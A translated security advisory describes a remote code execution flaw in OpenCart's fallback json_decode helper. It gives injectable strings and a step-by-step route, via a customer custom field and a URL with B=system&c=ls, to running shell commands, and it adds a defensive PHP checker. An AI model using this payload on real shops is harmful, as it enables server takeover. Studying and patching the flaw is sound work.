The OpenCart json_decode function has a remote PHP code execution vulnerability
14:12:56 Source: 360 Security broadcast Author: dark Yow
Recently, security researcher Naser Farhadi (Twitter: @naserfarhadi) discovered a remote PHP code execution vulnerability in the OpenCart json_decode function, affecting versions 2.1.0.2 to 2.2.0.0 (latest version).
The vulnerability exists in /upload/system/helper/json.php.
# /upload/system/helper/json.php
$match = '/".*? (?
The function is created from the JSON, and the json_decode function can be used.
Here are a few simple test examples:
var_dump(json_decode('{"OK": "1"."2"."3"}'));
var_dump(json_decode('{"OK": "$_SERVER[HTTP_USER_AGENT]"}'));
var_dump(json_decode('{"OK": "{$_GET[B]($_GET[c])}"}'));
In a real scenario, you can use /index.php?route=account/edit.
For example, enter $_SERVER[HTTP_USER_AGENT] as the name and save it (repeat twice).
Then, when the administrator accesses the management panel, they will see their own User-Agent in the latest activity area, where your name should be displayed.
Another example is custom_field in account/edit or account/register, which may be the most suitable.
This applies if the administrator has added a custom field for additional information, such as a phone number, in /admin/index.php?route=customer/custom_field.
You can directly inject your code in this custom_field.
For example, enter {$_GET[B]($_GET[c])} in this custom_field and save.
Then access:
http://host/shop_directory/index.php?route=account/edit&B=system&c=ls
You will see that the code is executed.
Note that this method only works when the PHP json extension is not installed.
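One way to check whether an installation meets the condition in the note above, together with a screen for stored field values. This is an added example, not part of the original advisory or of OpenCart's code; the function names and sample values are constructed for illustration.

```php
<?php
// Added example. Written without PHP 7 syntax so it also runs on the
// older PHP builds where the json extension may be absent.

// Report whether json_decode() is PHP's native implementation or a
// userland fallback such as the one in system/helper/json.php.
function json_decode_origin()
{
    if (!function_exists('json_decode')) {
        // Nothing defined yet: an application shipping a fallback
        // helper would define its own json_decode() here.
        return array('status' => 'missing', 'file' => null);
    }
    $ref = new ReflectionFunction('json_decode');
    if ($ref->isInternal()) {
        return array('status' => 'native', 'file' => null);
    }
    // User-defined: the condition under which the page's method works.
    return array('status' => 'userland', 'file' => $ref->getFileName());
}

// Flag a customer-supplied value containing PHP variable or complex
// interpolation syntax, as in the $_SERVER and $_GET test strings above.
function looks_like_php_interpolation($value)
{
    // "$name", "${...}" or "{$...}"; a price such as "$100" is not flagged
    return preg_match('/\$[A-Za-z_{]|\{\$/', $value) === 1;
}

// Constructed sample field values (not taken from a real system).
$samples = array(
    'Alice Example',
    '+1 555 0100',
    '$_SERVER[HTTP_USER_AGENT]',
    '{$_GET[B]($_GET[c])}',
);

$origin = json_decode_origin();
printf("json extension loaded: %s\n", extension_loaded('json') ? 'yes' : 'no');
printf("json_decode: %s %s\n", $origin['status'], (string) $origin['file']);

foreach ($samples as $value) {
    $verdict = looks_like_php_interpolation($value) ? 'FLAG' : 'ok';
    printf("%-28s %s\n", $value, $verdict);
}
```

Run it under the same PHP binary and configuration that serves the shop, since the CLI and the web SAPI can load different extensions. The status is native when the json extension is present, and the last two sample values are flagged.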
This article is translated by 360 security broadcasting.